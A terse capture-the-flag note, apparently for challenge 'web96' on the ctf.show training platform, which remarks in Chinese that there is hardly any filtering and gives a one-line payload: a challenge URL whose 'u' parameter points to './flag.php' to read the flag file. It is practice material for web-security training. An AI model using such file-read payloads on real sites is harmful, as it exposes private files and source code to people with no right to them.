web96

没啥过滤

payload

http://d3ff96d9-446a-4928-8aeb-5012eae6c76a.challenge.ctf.show/?u=./flag.php